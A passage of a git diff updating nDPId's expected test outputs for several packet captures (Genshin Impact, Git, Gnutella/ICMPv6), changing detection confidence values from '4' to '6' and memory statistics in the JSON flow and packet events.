00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1650813582412,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1650813582412,"pkt":"eJS0JASgYDjgxTWgCABFAAA8XGBAAD8GNXTAqAJkMTO1qJsGAFBg5zJJAAAAAKAC\/\/\/zjAAAAgQFtAQCCAo+Nj3MAAAAAAEDAwk="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1650813582583,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650813582583,"pkt":"YDjgxTWgeJS0JASgCABFAAA0AABAAC4GotwxM7WowKgCZABQmwaucKQhYOcySoAScUjS6QAAAgQFhgEBBAIBAwMC"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1650813582587,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1650813582587,"pkt":"eJS0JASgYDjgxTWgCABFAAAoXGFAAD8GNYfAqAJkMTO1qJsGAFBg5zJKrnCkIlAQAKyEJQAA"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650813582412,"flow_last_seen":1650813582588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1650813582588,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":39686,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":76,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1650541441246,"flow_last_seen":1650541441932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1414,"flow_tot_l4_payload_len":1975,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1650813583121,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.190.178","src_port":39822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650813582412,"flow_last_seen":1650813582588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1650813582588,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":39686,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":76,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1650541441246,"flow_last_seen":1650541441932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1414,"flow_tot_l4_payload_len":1975,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1650813583121,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.190.178","src_port":39822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":76,"source":"genshin-impact.pcap","alias":"nDPId-test","packets-captured":76,"packets-processed":75,"total-skipped-flows":0,"total-l4-payload-len":12925,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":36,"global_ts_msec":1655043605088} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655043605088,"flow_last_seen":1655043605088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655043605088,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":45246,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1655043605088,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655043605088,"pkt":"eJS0JASgYDjgxTWgCABFAAA8y9BAAD8GxgPAqAJkMTO1qLC+Jxyp+mQnAAAAAKAC\/\/\/OLAAAAgQFtAQCCArRkRhbAAAAAAEDAwk="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1655043605260,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655043605260,"pkt":"YDjgxTWgeJS0JASgCABFAAA0AABAAC4GotwxM7WowKgCZCccsL7ZMHkgqfpkKIAScUgbtQAAAgQFhgEBBAIBAwMC"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1655043605263,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655043605263,"pkt":"eJS0JASgYDjgxTWgCABFAAAoy9FAAD8GxhbAqAJkMTO1qLC+Jxyp+mQo2TB5IVAQAKzM8AAA"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655043605088,"flow_last_seen":1655043605265,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1655043605265,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":45246,"dst_port":10012,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655043605088,"flow_last_seen":1655043606011,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":1022,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1655043606011,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":45246,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1650813582412,"flow_last_seen":1650813583121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1414,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1655043606011,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":39686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655043605088,"flow_last_seen":1655043605265,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1655043605265,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":45246,"dst_port":10012,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655043605088,"flow_last_seen":1655043606011,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":1022,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1655043606011,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":45246,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1650813582412,"flow_last_seen":1650813583121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1414,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1655043606011,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":39686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":90,"source":"genshin-impact.pcap","alias":"nDPId-test","packets-captured":90,"packets-processed":90,"total-skipped-flows":0,"total-l4-payload-len":13947,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":44,"global_ts_msec":1655043606011} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 90/90 @@ -50,9 +50,9 @@ ~~ total active/idle flows...: 6/6 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5883497 bytes -~~ total memory freed........: 5883497 bytes -~~ total allocations/frees...: 118227/118227 +~~ total memory allocated....: 6017131 bytes +~~ total memory freed........: 6017131 bytes +~~ total allocations/frees...: 120989/120989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 829 chars diff --git a/test/results/git.pcap.out b/test/results/git.pcap.out index 93ccc1e7b..c78d1307c 100644 --- a/test/results/git.pcap.out +++ b/test/results/git.pcap.out 
@@ -4,8 +4,8 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1460821630164,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630164,"pkt":"nJcm0ghCPJcOZtCOCABFAAA8Q1ZAAEAGScLAqABNBZnnFbt3JMp+hgtEAAAAAKACchB0gwAAAgQFtAQCCAoBp0gSAAAAAAEDAwo="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1460821630221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630221,"pkt":"PJcOZtCOnJcm0ghCCABFCAA8AABAAC8GnhAFmecVwKgATSTKu3dqwE5VfoYLRaASOJBfrwAAAgQFrAQCCAorjWmrAadIEgEDAwc="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1460821630222,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1460821630222,"pkt":"nJcm0ghCPJcOZtCOCABFAAA0Q1dAAEAGScnAqABNBZnnFbt3JMp+hgtFasBOVoAQAB3G2AAAAQEICgGnSCArjWmr"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1460821630164,"flow_last_seen":1460821630222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1460821630222,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":1460821630164,"flow_last_seen":1460821631269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":68049,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1460821631269,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1460821630164,"flow_last_seen":1460821630222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1460821630222,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} 
+00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":1460821630164,"flow_last_seen":1460821631269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":68049,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1460821631269,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","packets-captured":90,"packets-processed":90,"total-skipped-flows":0,"total-l4-payload-len":68049,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1460821631269} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 90/90 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872053 bytes -~~ total memory freed........: 5872053 bytes -~~ total allocations/frees...: 118204/118204 +~~ total memory allocated....: 6005687 bytes +~~ total memory freed........: 6005687 bytes +~~ total allocations/frees...: 120966/120966 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 683 chars diff --git a/test/results/gnutella.pcap.out b/test/results/gnutella.pcap.out index a3324eb5f..f1991cc43 100644 
--- a/test/results/gnutella.pcap.out +++ b/test/results/gnutella.pcap.out 
@@ -3,58 +3,58 @@ 00259{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"gnutella.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":4,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":4,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAA=="} 00516{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffa4:e108","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":9752,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":78,"pkt_l4_len":24,"thread_ts_msec":9752,"pkt":"MzP\/pOEICAAn5uVZht1gAAAAABg6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/pOEIhwAMIAAAAAD+gAAAAAAAAMUNUZ+WpOEI"} -00577{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffa4:e108","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00577{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffa4:e108","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00525{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":9752,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":62,"pkt_l4_len":8,"thread_ts_msec":9752,"pkt":"MzMAAAACCAAn5uVZht1gAAAAAAg6\/\/6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAChQDu3AAAAAA="} 
-00586{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00586{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00530{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":9752,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":9752,"pkt":"MzMAAAAWCAAn5uVZht1gAAAAACQAAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAAECAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/pOEI"} -00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":10250,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":10250,"pkt":"MzMAAAAWCAAn5uVZht1gAAAAACQAAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAAECAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/pOEI"} 00532{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":10750,"flow_last_seen":10750,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":10750,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":10750,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":10750,"pkt":"MzMAAAABCAAn5uVZht1gAAAAACA6\/\/6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAABiAAnqSAAAAD+gAAAAAAAAMUNUZ+WpOEIAgEIACfm5Vk="} 
